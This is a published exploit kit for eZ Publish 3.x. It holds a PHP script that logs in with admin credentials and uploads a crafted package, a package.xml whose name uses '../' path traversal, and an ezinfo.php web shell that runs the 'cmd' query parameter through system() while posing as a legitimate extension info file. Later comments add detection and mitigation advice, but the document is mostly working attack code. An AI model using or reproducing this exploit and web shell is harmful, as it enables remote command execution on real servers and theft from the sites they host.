// eZPublish_abuse_of_functionality_zero_day.php
--------------------------------------------------------------
<?php
/* eZ Publish OS Commanding executing exploit by s4avrd0w [s4avrd0w@p0c.ru] Versions affected 3.x
* tested on version 3.9.0, 3.9.5, 3.10.1
usage:
# ./eZPublish_abuse_of_functionality_zero_day -u=username -p=password -s=EZPublish_server
The options are required:
-u Login of the exists admin on eZ Publish -p Admin password on eZ Publish -s Target eZ Publish admin interface
example:
# ./eZPublish_abuse_of_functionality_zero_day -u=toor -p=P@ssw0rd -s=http://127.0.0.1/ezwebin_site_admin/ [+] Exploit successfully sending [+] For OS Commanding executing go to: http://127.0.0.1/ezinfo/about?cmd=<OScommand> */
function help_argc($script_name) {
    // Print the usage banner for this command-line script to stdout.
    // $script_name is interpolated into the generic invocation line; the example line is fixed text.
    // The banner's line breaks and its trailing space are part of the original output and are kept.
    print " usage:
# ./{$script_name} -u=username -p=password -s=EZPublish_server
The options are required: -u Login of the new admin on eZ Publish -p Password of the new admin on eZ Publish -s Target eZ Publish admin interface
example:
# ./eZPublish_abuse_of_functionality_zero_day -u=toor -p=P@ssw0rd -s=http://127.0.0.1/ezwebin_site_admin/ [+] Exploit successfully sending [+] For OS Commanding executing go to: http://127.0.0.1/ezinfo/about?cmd=<OScommand> ";
}
function successfully($server) {
// Prints the follow-up URL after an upload the script judged successful.
// The host is carved out of $server by skipping the first 7 characters (i.e. it assumes an
// "http://" scheme) and stopping at the next "/". NOTE(review): brittle — for an https:// URL the
// offsets are wrong, and when there is no "/" after the host strpos() returns false, which makes
// the computed length negative.
$server = substr($server,7,strpos($server,"/",7)-7);
print " [+] Exploit successfully sending [+] For OS Commanding executing go to: http://$server/ezinfo/about?cmd=<OScommand> "; }
// --- Driver ------------------------------------------------------------------------------------
// Expects exactly three "-x=value" options ($argc == 4 includes the script name); anything else,
// or a help flag in argv[1], prints the usage text and exits. Option parsing keeps only the
// character after the leading "-" as the key and everything from offset 3 as the value
// ("-u=toor" -> $ARG['u']); a repeated key keeps its first value.
if ($argc != 4 || in_array($argv[1], array('--help', '-help', '-h', '-?'))) { help_argc($argv[0]); exit(0); } else { $ARG = array(); foreach ($argv as $arg) { if (strpos($arg, '-') === 0) { $key = substr($arg,1,1); if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg)); } }
// NOTE: `u`, `p`, `s` below are unquoted constant names, not strings — this relies on PHP 5's
// undefined-constant-to-string fallback (a notice at the time); PHP 8 throws an Error here. The
// whole script targets a PHP 5-era runtime: the pecl_http v1 HttpRequest class and eregi() it
// uses no longer exist in current PHP.
// The package archive is taken from the current working directory and is not inspected here;
// its contents (package.xml and the dropped ezinfo.php) are listed further down this page.
if ($ARG[u] && $ARG[p] && $ARG[s]) { if (file_exists("ez_exploit.ezpkg")) {
// Step 1 — authenticate as an existing administrator. This is the key property for defenders:
// the technique is post-authentication abuse of the legitimate package-upload feature, not an
// unauthenticated flaw. Valid admin credentials are a precondition, so controls on the admin
// accounts (credential hygiene, auditing of admin logins, and restricting the role policy that
// grants the package module to the few accounts that need it) are the primary mitigation.
$post_login_fields = array( 'Login' => $ARG[u], 'Password' => $ARG[p], 'LoginButton' => '1', 'RedirectURI' => '' );
// Fixed, outdated browser User-Agent and a Referer equal to the target. Both are client-controlled
// and must never be treated as trust signals; a static UA string like this one is, however, a
// usable log signature for this particular tool.
$headers = array( 'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14', 'Referer' => $ARG[s] );
// POST to <admin site>/user/login. Detection: an admin login immediately followed by a multipart
// POST to /package/upload from the same client is the request sequence to alert on.
$res_http = new HttpRequest($ARG[s]."/user/login", HttpRequest::METH_POST); $res_http->addPostFields($post_login_fields); $res_http->addHeaders($headers); try { $http_response = $res_http->send();
// Login outcome is inferred from the HTML body: the author treats a "message-warning" fragment
// as a failed login (presumably the login template's error block — verify against the template).
// The session is taken from the first cookie in Set-Cookie, split into name and value; a missing
// Set-Cookie header aborts below.
if (eregi("message-warning", $http_response->getBody())) { print "[-] Login failed"; exit(0); } else { $http_headers = $http_response->getHeaders(); if ($http_headers['Set-Cookie']) {
$eZcookie = explode(";",$http_headers['Set-Cookie']); $eZadmcookie = explode("=",$eZcookie[0]);
$cookies = array( $eZadmcookie[0] => $eZadmcookie[1] );
// Step 2 — upload the archive through the admin package/upload form (multipart, file field
// "PackageBinaryFile") using the session cookie from step 1. The dropped ezinfo.php is the
// persistent foothold; file-integrity monitoring of the extension/ tree and alerting on any
// .ezpkg upload catch this stage. The package.xml shown below carries "../" segments in its
// <name>, which is presumably how the installer ends up writing files outside the package
// directory — confirm against the package import code when assessing the fix.
$post_fields = array( 'MAX_FILE_SIZE' => '32000000', 'UploadPackageButton' => '1' );
$res_http = new HttpRequest($ARG[s]."/package/upload", HttpRequest::METH_POST); $res_http->addPostFields($post_fields); $res_http->addHeaders($headers); $res_http->addCookies($cookies); $res_http->addPostFile("PackageBinaryFile","ez_exploit.ezpkg","multipart/form-data"); try { $http_response = $res_http->send();
// Success heuristic only: the response no longer contains the upload button. Nothing here
// verifies what the server actually did with the archive.
if (!eregi("UploadPackageButton", $http_response->getBody())) { successfully($ARG[s]); } else { print "[-] Exploit failed"; }
} catch (HttpException $exception) {
print "[-] Not connected"; exit(0);
}
} else { print "[-] Error get cookie"; }
}
} catch (HttpException $exception) {
print "[-] Not connected"; exit(0);
}
// Fall-through branches: archive missing from the working directory, or one of -u/-p/-s absent.
} else { print "[-] File ez_exploit.ezpkg not found\n"; print "[-] Exploit failed"; } } else { help_argc($argv[0]); exit(0); } }
?>
-------------------------------------------------------------
//ezinfo.php
-------------------------------------------------------------
<?php
// Web shell carried inside the ez_exploit.ezpkg archive uploaded by the script above: whatever
// arrives in the `cmd` query parameter is passed straight to system() and the output is echoed
// inside <pre> tags. No authentication, no allow-list, no logging — any client that can reach
// this file runs commands as the web server user.
// Defender notes: (1) a legitimate extension ezinfo.php contains only the *Info class that
// follows, so any system()/exec()/$_GET usage in extension/*/ezinfo.php is a high-confidence
// indicator of compromise; (2) web-server access logs containing "ezinfo/about?cmd=" show the
// shell being used; (3) on discovery, treat the host as compromised (remove the file, rotate the
// admin credentials used for the upload, review package-upload activity), not merely as a
// misconfigured extension.
print "<pre>"; system($_GET['cmd']); print "</pre>";
//
// SOFTWARE NAME: eZ publish
// SOFTWARE RELEASE: 3.9.0
// BUILD VERSION: 17785
// COPYRIGHT NOTICE: Copyright (C) 1999-2006 eZ systems AS
// SOFTWARE LICENSE: GNU General Public License v2.0
// NOTICE: >
// This program is free software; you can redistribute it and/or
// modify it under the terms of version 2.0 of the GNU General
// Public License as published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of version 2.0 of the GNU General
// Public License along with this program; if not, write to the Free
// Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
// MA 02110-1301, USA.
//
//
class ezdhtmlInfo
{
    // Static metadata for the "eZ Online Editor" extension — name, version, copyright and
    // licence — returned as a keyed array. Presumably this is the shape eZ Publish's about page
    // reads from each extension's ezinfo.php; confirm against the core before relying on it.
    public function info()
    {
        $name      = "eZ Online Editor";
        $version   = "4.2";
        $copyright = "Copyright (C) 1999-2006 eZ systems AS";
        $license   = "GNU General Public License v2.0";

        return array(
            'Name'      => $name,
            'Version'   => $version,
            'Copyright' => $copyright,
            'License'   => $license,
        );
    }
}
?>
---------------------------------------------------------------------------------
//package.xml
---------------------------------------------------------------------------------
<?xml version="1.0" encoding="UTF-8"?> <package version="3.8.0" development="false" is_active="true" install_type="import"> <name>../../../../extension/ezdhtml</name> <summary>Website Interface</summary> <description>Website Interface is a web based CMS solution based on eZ Publish. It contains templates and settings that meets the most common requirements for content management systems.</description> <vendor>eZ systems</vendor> <type value="site" /> <ezpublish> <version>3.8.0</version> <named-version>3.8</named-version> </ezpublish> <maintainers> <maintainer> <name>Administrator User</name> <email>nospam@ez.no</email> <role>lead</role> </maintainer> </maintainers> <packaging> <timestamp>1153313252</timestamp> <host>packages.jkn.ez.no</host> </packaging> <documents> <document mime-type="text/plain" name="LICENCE" /> </documents> <changelog> <entry person="Administrator User" email="nospam@ez.no" release="1"> <change>Creation of package.</change> </entry> </changelog> </package>
------------------------------------------------------------------------------------------------